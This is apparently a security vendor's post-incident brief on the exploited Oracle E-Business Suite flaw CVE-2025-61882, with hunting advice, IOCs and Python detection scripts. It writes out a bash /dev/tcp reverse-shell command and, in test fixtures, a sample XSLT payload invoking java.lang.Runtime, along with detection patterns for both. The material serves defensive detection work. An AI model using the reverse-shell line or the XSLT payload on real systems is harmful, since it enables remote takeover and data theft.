Oracle E-Business Suite Zero-Day (CVE-2025-61882) — Post-Incident Technical Brief
Posted on: 15 October 2025 | Author: Foresiet
Summary
In late 2025, a critical pre-authentication remote-code-execution vulnerability (tracked as CVE-2025-61882) in Oracle E-Business Suite (EBS) — specifically the Concurrent Processing / BI-Publisher integration — was exploited in a large-scale extortion/data-theft campaign attributed to the Cl0p/Clop extortion cluster.

Attackers abused the flaw to run attacker-controlled XSLT/Java payloads, gain remote code execution on EBS application servers, and exfiltrate sensitive data for extortion.

Oracle released emergency patches and guidance; multiple threat intelligence teams published technical writeups, IOCs, and mitigation steps.
What Exactly Happened (High Level)
- The vulnerability allowed unauthenticated HTTP requests to reach Oracle’s Concurrent Processing / BI-Publisher integration and trigger server-side handling of attacker-controlled XSLT resources. Successful exploitation enabled code execution on the app server process.
- Exploit chains combined SSRF/misrouting of template/XSLT fetches with unsafe evaluation paths in the BI-Publisher engine, enabling remote template injection and execution. Attackers used this to upload and execute scripts, create web shells or exfiltrate data.
- The campaign’s operational objective appears to have been data theft and extortion: attackers exfiltrated data to pressure victims into paying ransoms or to publish stolen files.
Technical Analysis — Deconstructing the Exploits
The exploit chains reported in vendor and vendor-analysis writeups typically follow these stages:
1. Reconnaissance & targeting
Internet-facing EBS instances (particularly versions 12.2.3 → 12.2.14) were enumerated and probed for the vulnerable BI-Publisher/Concurrent Processing endpoints. NVD confirms affected versions.
2. Pre-auth request that triggers an XSLT/template fetch
The attacker makes a crafted HTTP request that causes EBS to fetch an attacker-controlled XSLT/template via a return_url-like parameter or similar template-loading function. Because the server attempts to fetch and process external templates, the attacker controls code that will be interpreted by the template engine. Multiple vendor writeups describe the SSRF/misrouting vector and malicious XSLT fetch.
3. Template parsing → code execution
The BI-Publisher engine processes the attacker-controlled XSLT which contains constructs that evaluate system calls, Java reflection, or other engine features — resulting in arbitrary command execution in the context of the EBS application user. This is the core RCE step observed in analyses.
4. Post-exploitation: persistence, discovery, and data staging
Observed follow-on activities include: dropping web shells or scripts, creating new database templates, executing OS commands to collect credentials and data, and staging exfiltration to external storage (FTP/S3/HTTP). Detection guidance from multiple vendors stresses looking for newly created templates, suspicious process invocations, and large outbound transfers.
Detection & Hunting (practical checks)
Priority quick wins
Block external HTTP(S) access to EBS admin or BI-Publisher endpoints until patched (network/WAF). Apply Oracle emergency patches immediately; test and roll out per Oracle guidance.
Log / SIEM hunts
Webserver access logs: search for requests with unusual parameters containing return_url, remote XSLT URLs, or external hostnames in template-loading parameters. Example Splunk-style pattern (conceptual):
index=web source=ebs_access "*return_url*" OR "*.xsl" OR "*.xml" | stats count by src_ip, uri, params
Look for HTTP requests that cause the EBS server to connect out to unfamiliar hosts (monitor egress flows and DNS resolution logs).
File system & DB hunts: scan for new/modified BI-Publisher templates, unexpected DB objects or scheduled jobs created around the time of suspicious web hits.
Endpoint telemetry: detect unusual Java process invocations, java -jar executions, or child processes spawned by the EBS app process account.
If you suspect compromise, capture memory images of the EBS app servers and examine them for injected Java classes, in-memory web shells, or command history executed in application-user contexts. Google/Mandiant guidance recommends memory forensics where suspicious activity is observed.
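As an added example (not code from the original post or from Oracle), the script below implements the web-log hunt described above over a few constructed access-log lines: it parses the request parameters and flags any parameter whose value is an absolute URL pointing at a host outside a trusted internal suffix, with extra weight on return_url-style names and .xsl/.xml targets, then aggregates by source IP like the conceptual Splunk query. The /ebs/bip/template path, the corp.example suffix and all addresses are assumptions made for the sample, not real EBS endpoints or campaign indicators.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format). The source
# addresses, host names and the /ebs/bip/template path are made up for this
# example; they are not real EBS endpoints or campaign indicators.
SAMPLE_ACCESS_LOG = """\
10.20.30.40 - - [05/Oct/2025:09:10:11 +0000] "GET /ebs/bip/template?return_url=http://intranet.corp.example/invoice.xsl HTTP/1.1" 200 1421 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Oct/2025:09:12:45 +0000] "GET /ebs/bip/template?return_url=http://203.0.113.99/t.xsl HTTP/1.1" 200 88 "-" "python-requests/2.31"
203.0.113.7 - - [05/Oct/2025:09:12:46 +0000] "POST /ebs/bip/template?tmpl=http%3A%2F%2F203.0.113.99%2Fp.xml HTTP/1.1" 500 0 "-" "python-requests/2.31"
10.20.30.41 - - [05/Oct/2025:09:15:00 +0000] "GET /ebs/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache combined-log prefix: client IP, identd, user, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Host suffixes the EBS tier is allowed to fetch templates from
# (assumption: replace with your own internal domains).
INTERNAL_SUFFIXES = ("corp.example",)

# Extensions typical of template/XSLT resources named in the hunt above.
TEMPLATE_EXTS = (".xsl", ".xslt", ".xml")


def is_internal(host, internal_suffixes=INTERNAL_SUFFIXES):
    """True when the host is exactly, or lies under, a trusted internal suffix."""
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in internal_suffixes)


def hunt_access_log(log_text, internal_suffixes=INTERNAL_SUFFIXES):
    """Return one finding per request parameter that points the server at an
    external template/XSLT resource (the SSRF / template-fetch vector)."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src_ip, ts, method, uri, status = m.groups()
        query = urlsplit(uri).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                target = urlsplit(value)
                if target.scheme not in ("http", "https") or not target.hostname:
                    continue  # not an absolute URL, so nothing for the server to fetch
                if is_internal(target.hostname, internal_suffixes):
                    continue
                if "return_url" in name.lower():
                    reason = "return_url points at external host"
                elif target.path.lower().endswith(TEMPLATE_EXTS):
                    reason = "template-style resource fetched from external host"
                else:
                    reason = "absolute external URL in request parameter"
                findings.append({
                    "src_ip": src_ip, "time": ts, "method": method, "uri": uri,
                    "status": status, "param": name, "host": target.hostname,
                    "reason": reason,
                })
    return findings


def count_by_src_ip(findings):
    """Equivalent of the '| stats count by src_ip' step of the conceptual Splunk hunt."""
    counts = {}
    for f in findings:
        counts[f["src_ip"]] = counts.get(f["src_ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = hunt_access_log(SAMPLE_ACCESS_LOG)
    for h in hits:
        print(f'{h["time"]} {h["src_ip"]} {h["method"]} {h["uri"]} -> '
              f'{h["param"]}={h["host"]} ({h["reason"]})')
    print(count_by_src_ip(hits))
```

Only the two requests from 203.0.113.7 are reported; the first line is skipped because its return_url target is under the trusted suffix. Pair the output with egress flow or DNS logs for the same minute to confirm whether the EBS host actually connected out to the flagged address.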
IOCs & Where to Get Them
Oracle’s emergency alert contains IOCs (IP addresses, hashes, sample commands). Vendor posts (Rapid7, CrowdStrike, Tenable) published additional hashes and detection signatures — pull these directly into your EDR/SIEM/Network devices. Start here: Oracle Security Alert for CVE-2025-61882 and Rapid7 / CrowdStrike writeups for confirmed IOCs and community analysis.
Key IOCs for CVE-2025-61882 / EBS Exploitation Campaign
IP addresses (Observed Connection Activity)
200.107.207.26
185.181.60.11
Suspicious command / shell pattern (observed used for outbound callback)
sh -c /bin/bash -i >& /dev/tcp/<host>/<port> 0>&1
(Oracle's advisory shows the typical reverse-TCP spawn command; adapt detection to match variations such as different ports, a bare /dev/tcp/<host>/<port> redirection, or bash -i >& /dev/tcp/… without the sh -c wrapper.)
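As an added example (not from the original post or the Oracle advisory), the following Python classifies process-start telemetry for the variations just described: any /dev/tcp or /dev/udp redirection is extracted with its host and port, an interactive shell (-i) wired to that socket with >& is rated high, and other shell socket use is rated medium unless it runs under the EBS application account with the app JVM as parent. The key=value telemetry format, the ebsapp and monitor accounts, the PIDs and the 203.0.113.99 address are constructed for the sample.

```python
import re

# Constructed process-telemetry lines, one process start per line, in a simple
# key=value form. The account names, PIDs and the 203.0.113.99 address are made
# up for this example.
SAMPLE_TELEMETRY = """\
user=ebsapp pid=4242 ppid=4100 parent=java cmd="sh -c /bin/bash -i >& /dev/tcp/203.0.113.99/4444 0>&1"
user=ebsapp pid=4243 ppid=4100 parent=java cmd="bash -i >& /dev/tcp/203.0.113.99/8080 0>&1"
user=ebsapp pid=4251 ppid=4100 parent=java cmd="/bin/sh -c ls -la /opt/ebs/out"
user=monitor pid=4260 ppid=900 parent=crond cmd="bash -c exec 3<>/dev/tcp/monitor.corp.example/443"
user=root pid=1201 ppid=1 parent=systemd cmd="/usr/sbin/crond -n"
"""

TELEMETRY_RE = re.compile(r'user=(\S+) pid=(\d+) ppid=(\d+) parent=(\S+) cmd="(.*)"$')

# Any reference to the bash /dev/tcp or /dev/udp pseudo-device, capturing host and port.
DEV_TCP_RE = re.compile(r"/dev/(tcp|udp)/([^/\s'\"]+)/(\d{1,5})")

# An interactive shell (-i) whose output is redirected with >& to the pseudo-device:
# the form shown in the Oracle advisory, with or without the leading sh -c wrapper.
INTERACTIVE_REDIRECT_RE = re.compile(r"\b(?:bash|sh)\s+-i\b[^\n]*?>&\s*/dev/(?:tcp|udp)/")


def classify_command(cmd):
    """Return None when the command makes no use of /dev/tcp or /dev/udp,
    otherwise a dict with protocol, host, port and a severity tier."""
    m = DEV_TCP_RE.search(cmd)
    if not m:
        return None
    proto, host, port = m.groups()
    if INTERACTIVE_REDIRECT_RE.search(cmd):
        severity = "high"      # interactive shell attached to a remote socket
    else:
        severity = "medium"    # raw socket use from a shell; needs context review
    return {"proto": proto, "host": host, "port": int(port), "severity": severity}


def scan_telemetry(text, app_accounts=("ebsapp",)):
    """Run classify_command over every telemetry line. Medium findings are
    raised to high when the shell was spawned under an EBS application
    account by the app JVM, since the app tier has no normal reason to open
    raw sockets from a shell."""
    alerts = []
    for line in text.splitlines():
        m = TELEMETRY_RE.match(line)
        if not m:
            continue
        user, pid, ppid, parent, cmd = m.groups()
        verdict = classify_command(cmd)
        if verdict is None:
            continue
        verdict.update({"user": user, "pid": int(pid), "parent": parent, "cmd": cmd})
        if user in app_accounts and parent == "java" and verdict["severity"] == "medium":
            verdict["severity"] = "high"
        alerts.append(verdict)
    return alerts


if __name__ == "__main__":
    for a in scan_telemetry(SAMPLE_TELEMETRY):
        print(f'[{a["severity"]}] user={a["user"]} pid={a["pid"]} parent={a["parent"]} '
              f'-> {a["proto"]}://{a["host"]}:{a["port"]}  {a["cmd"]}')
```

The two ebsapp shells are reported as high with the callback host and port pulled out for blocking and pivoting; the cron-driven connectivity check lands at medium so an analyst still sees it without it paging anyone. Matching on the /dev/tcp path rather than on the exact advisory string is what keeps the rule robust to port and wrapper changes.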
File hashes (Oracle advisory — SHA256)
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d — oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 — oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b — oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py
Additional leaked exploit file hashes (MD5)
b296d3b3115762096286f225696a9bb1 — exp.py (MD5)
e278700f827590c1dff9e24116bde4da — readme.md (MD5)
23094d64721a279c0ce637584b87d6f1 — server.py (MD5)
Important: IOCs change quickly. Use vendor pages above for the authoritative and most current lists.
Example YARA rule (detecting likely exploit artifacts / suspicious XSLT payloads)
This YARA rule is intended to detect suspicious XSLT templates or attacker payload files found on disk or in capture locations that contain telltale strings used in the observed exploit chains (e.g., return_url parameters, or xsl:stylesheet together with Java reflection calls). Tune and test before deployment; YARA can generate false positives on legitimate BI-Publisher templates. Use file path/context exclusions (e.g., a known-good templates directory).

Scan suspect directories where received templates or uploaded files appear, or feed captured HTTP bodies from proxy logs into a YARA triage. Tune condition and add legitimate template path whitelists to reduce noise.
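As an added example that is not the post's own YARA rule, the Python below applies the same indicator logic to a set of files or captured HTTP bodies: a template is flagged when it declares an xsl:stylesheet and also carries a Java extension indicator (the Xalan java namespace, java.lang.Runtime / getRuntime, or ProcessBuilder), and a request body is flagged when it carries a return_url pointing at an absolute URL; hits under a known-good templates directory are reported separately rather than alerted, which is the path exclusion the paragraph above recommends. The sample paths, the known-good directory and the 203.0.113.99 address are constructed for this example.

```python
import re

# Indicator patterns, in the spirit of the YARA rule described above. They are
# compiled as case-insensitive byte regexes so the same scan works on files
# from disk and on raw HTTP bodies pulled from proxy captures.
STYLESHEET = re.compile(rb"<xsl:stylesheet", re.I)
JAVA_INDICATORS = {
    "xalan_java_ns": re.compile(rb"xml\.apache\.org/xalan/java", re.I),
    "runtime_class": re.compile(rb"java\.lang\.Runtime|getRuntime\s*\(", re.I),
    "processbuilder": re.compile(rb"java\.lang\.ProcessBuilder", re.I),
}
RETURN_URL = re.compile(rb"return_url\s*=\s*https?://", re.I)

# Directories holding vetted templates (assumption: point this at your own
# known-good template locations). Matches under them are reported as excluded.
KNOWN_GOOD_DIRS = ("/opt/ebs/templates/known_good",)


def under_known_good(path, known_good_dirs=KNOWN_GOOD_DIRS):
    """True when the path sits inside one of the known-good directories."""
    return any(path.startswith(d.rstrip("/") + "/") for d in known_good_dirs)


def scan_blob(content):
    """Return (rule_name, indicators) when the bytes look like a malicious XSLT
    template or a template-fetch request body, else None."""
    hits = [name for name, rx in JAVA_INDICATORS.items() if rx.search(content)]
    if STYLESHEET.search(content) and hits:
        return ("xslt_java_extension", hits)
    if RETURN_URL.search(content):
        return ("return_url_template_fetch", ["return_url"])
    return None


def triage(files, known_good_dirs=KNOWN_GOOD_DIRS):
    """files: mapping of path -> bytes. Returns (flagged, excluded), each a list
    of (path, rule, indicators); excluded holds matches under known-good dirs
    so they can be reviewed without raising alerts."""
    flagged, excluded = [], []
    for path, content in files.items():
        verdict = scan_blob(content)
        if verdict is None:
            continue
        rule, hits = verdict
        (excluded if under_known_good(path, known_good_dirs) else flagged).append((path, rule, hits))
    return flagged, excluded


# Constructed sample inputs: a benign template, a suspicious upload, a vetted
# template that legitimately declares the Xalan Java extension, and a captured
# HTTP body from a proxy log. All paths and the address are made up.
SAMPLE_FILES = {
    "/opt/ebs/templates/known_good/invoice.xsl": (
        b'<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">'
        b'<xsl:template match="/"><xsl:value-of select="invoice/amount"/></xsl:template>'
        b'</xsl:stylesheet>'),
    "/tmp/uploads/t1.xsl": (
        b'<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" '
        b'xmlns:java="http://xml.apache.org/xalan/java">'
        b'<xsl:template match="/"><xsl:value-of select="java:java.lang.Runtime.getRuntime()"/>'
        b'</xsl:template></xsl:stylesheet>'),
    "/opt/ebs/templates/known_good/legacy_ext.xsl": (
        b'<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" '
        b'xmlns:java="http://xml.apache.org/xalan/java">'
        b'<!-- legacy report; uses java.lang.Runtime for environment lookups -->'
        b'</xsl:stylesheet>'),
    "/var/log/proxy/captures/req-17.body": b"report=AR&return_url=http://203.0.113.99/t.xsl",
}


if __name__ == "__main__":
    flagged, excluded = triage(SAMPLE_FILES)
    for path, rule, hits in flagged:
        print(f"FLAGGED  {path}  {rule}  {hits}")
    for path, rule, hits in excluded:
        print(f"excluded {path}  {rule}  {hits}")
```

To run this over real data, build the mapping from a directory walk of upload and template locations plus the body files your proxy writes out; the excluded list is worth a periodic look, because a vetted template that newly matches the Java indicators is exactly the "new/modified BI-Publisher template" the hunting section asks you to watch for.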
Closing Notes & Sources
This post summarizes currently available public intelligence and vendor advisories about CVE-2025-61882 and the associated exploitation campaign. Because the situation is active and IOCs are updated frequently, ingest the official Oracle Security Alert and vendor blogs into your threat feeds and keep your detection signatures up to date.
Conclusion
We are continuing to actively monitor threat-actor leak sources and public disclosures related to this EBS exploitation campaign, including potential future postings by extortion groups. However, because the campaign is ongoing and may result in additional data releases, we will maintain heightened monitoring, update detections, and investigate any new indicators as they appear.